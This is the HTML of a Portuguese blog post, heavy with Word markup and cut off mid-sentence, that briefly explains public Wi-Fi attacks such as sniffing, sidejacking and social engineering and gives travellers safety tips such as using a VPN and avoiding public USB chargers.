&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;Para
evitar esses ataques, primeiro você precisa saber de que tipo de ataques sua
rede Wi-Fi é propensa.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;Alguns dos ataques mais difíceis e prejudiciais incluem
Sniffing, Sidejacking e Engenharia Social.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;b&gt;&lt;span style=&quot;font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;1 - Sniffing&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt; , que é um ataque passivo, baseia-se basicamente em
um software sniffer que rouba os dados que passam por uma rede de informática.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;Enquanto os sniffers de
pacotes são realmente projetados para hackers éticos, solução de problemas e
análise de dados, os cibercriminosos o usam para intrusar em sua rede e roubar
os dados.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Alguns ataques de sniffing típicos
incluem: sniff de LAN, sniff de protocolo, ARP sniff e sniffing de senha da
Web.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Os hackers podem roubar suas senhas sobre
Wi-Fi usando esta técnica!&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;b&gt;&lt;span style=&quot;font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;2 - Sidejacking&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt; , também conhecido como seqüestro de sessão é
um tipo de ataque Wi-Fi onde os atacantes usam seus cookies para representar
sua conta e entrar em qualquer site.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;Enquanto os sites codificam seu processo de login, eles nunca
criptografam seus cookies tornando sua conta vulnerável.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Uma rede Wi-Fi aberta compartilha os cookies da sessão
através do ar, o que torna sua rede ainda mais vulnerável e propensa a atacar.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;b&gt;&lt;span style=&quot;font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;3 - A engenharia social&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt; é um tipo de ataque onde os atacantes enganam
os usuários para quebrar seus sistemas de segurança regulares.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;É mais como enganar os
usuários.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Os ataques de engenharia social de uso
comum incluem: clique em iscas, phishing , scareware e pretexto.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;Agora,
quando você está ciente desses ataques comuns de Wi-Fi, vamos falar sobre algumas
dicas e precauções a serem tomadas para acessar de forma segura a Internet ao
viajar.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;b&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 14.0pt;&quot;&gt;Segurança
Wi-Fi quando viajando&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;b&gt;&lt;span style=&quot;font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Mantenha o seu WiFi desligado&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;Geralmente,
todos temos o hábito de manter nosso WiFi aberto em nossos dispositivos móveis
que se conecta automaticamente a uma rede WiFi pública aberta que não é segura.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;Mantenha o seu WiFi desligado
e ligue-o apenas quando quiser usar a internet.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Não
é recomendado usar as conexões WiFi públicas a menos que você tenha algo
realmente importante a fazer.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;As conexões WiFi
abertas que não estão protegidas com uma senha geralmente são perigosas, pois
qualquer pessoa que use o mesmo WiFi pode interferir e cortar seu dispositivo.&lt;/span&gt;
&lt;span class=&quot;notranslate&quot;&gt;Todos os seus detalhes de login estão no ar.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;b&gt;&lt;span style=&quot;font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Usar VPN&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Uma
rede privada virtual, muitas vezes denominada VPN, é um tipo de túnel privado
da sua rede, o que lhe garante a intrusão indesejada.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;Durante a viagem, muitas
vezes usamos conexões Wi-Fi públicas para nossas transações de dinheiro
on-line, que podem ser perigosas.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Mas se você
estiver usando uma VPN, esconderá todas as suas atividades na internet dos
atacantes.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;É bastante fácil configurar uma VPN
para dispositivos móveis, laptops e tablets.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Existem
vários softwares VPN gratuitos que você pode usar.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;strong&gt;&lt;span style=&quot;font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;As estações de cobrança públicas não são seguras&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Você
já ouviu falar sobre Juice Jacking ?&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;É uma maneira de roubar todos os dados armazenados no seu
telefone através do cabo de carregamento USB.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Quando
você usa a porta USB de estações de carregamento público, você está realmente
concedendo aos hackers para acessar todos os seus dados sem saber.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;É sempre melhor ter seu próprio banco de energia e não usar
as estações de carregamento público para seus telefones celulares.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;strong&gt;&lt;span style=&quot;font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Configurações de compartilhamento&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Antes
de se conectar ao Wi-Fi público, verifique se as configurações de
compartilhamento em seus dispositivos estão desligadas.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;Manter essas configurações,
ON, leva a um roubo de dados obviamente.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;strong&gt;&lt;span style=&quot;font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Carregar um dispositivo habilitado para Ethernet&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Sim,
não podemos imaginar nossas vidas sem a internet, mas usar o WiFi público não é
